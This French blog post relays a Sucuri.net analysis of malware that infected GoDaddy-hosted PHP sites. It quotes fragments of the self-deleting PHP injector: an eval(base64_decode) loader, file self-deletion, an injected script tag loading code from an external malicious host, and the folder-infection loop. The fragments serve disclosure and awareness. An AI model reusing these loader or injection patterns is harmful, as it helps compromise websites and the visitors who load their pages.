Je vous avais parlé, dans un précédent billet, d'un soucis sur certains sites hébergés chez GoDaddy. Les équipes de Sucuri.net ont planché sur le problème, et ont obtenu de nouvelles informations...

Pendant que GoDaddy été occupé à blâmer ses utilisateurs, un certain Kevin Reville, de sucuri.net,  fatigué par ces piratages,  a créé un script cron pour vérifier que son site fonctionne et qui l'alerte dès qu'un nouveau fichier est ajouté sur son hébergement. 

Qu'est-ce qu'il a trouvé?  Tout simplement LE malware utilisé par les hackers, celui là même qui parvenait à infecter tout le monde. 

Juste pour être clair: Rien à voir avec Wordpress.  En fait, dans le site suivi par la tâche cron, rien ne s'est connecté à Wordpress, ni même à l'un de ses composants.  De plus, des sites Joomla (et d'autres aplpications web) se sont également faits pirater, donc, Wordpress n'est qu'une coïncidence. 

Alors qu'est-ce qu'il se passe? 

Les hackers sont capables de créer ce fichier unique PHP  sur tous les sites et de l'exécuter à distance afin de tout infecter. Une fois cela fait, le script se supprimer lui-même. 

Analyse: 

Le script, dans ce qu'a rapporté la tâche cron, a été appelé "simple_production.php"  (mais des rapports font état de différents noms utilisés). Il s'agit d'un fichier base64, qui,en brut, ressemble à ceci: 

eval(base64_decode("DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3....

Décodé, voici ce qu'il fait:

1-Tout d'abord, le script se supprime: 

$z=$_SERVER["SCRIPT_FILENAME"];

@unlink($z);

2-Ensuite, il encode le javascript: 

$cod=base64_encode('<script src="http://holasionweb.com/oo.php"..

$to_pack='if(function_exists(\'ob_start\')&&!isset($GLOBALS[\'mr_n..

3-Il scanne tous les répertoires et ajoute le malware à tous les fichiers php. 

Après cela, il affiche le nombre de fichiers infectés et les sorties: 

$val=dirname($z);

$totalinjected=0;

echo "Working with $val
";

$start_time=microtime(true);

if ($val!="")inject_in_folder($val);

$end_time=microtime(true)-$start_time;

echo "|Injected| $totalinjected files in $end_time seconds
";

Ainsi, un simple script PHP fait tout ce gâchis.  La question est maintenant de savoir comment les hackers sont-ils capables d'injecter  ce fichier sur tous les sites GoDaddy... Les autorisations sur la plupart des sites qui ont été vérifiés sont correctes. Ce ne visiblement pas non plus un bug d'application web. La seule conclusion restante est donc un problème interne à GoDaddy. 

Si vous êtes un client GoDaddy et que vous vous êtes fait piraté, envoyez leur ce lien... Peut être que cela les aidera ^

Plus d'infos sur sucuri.net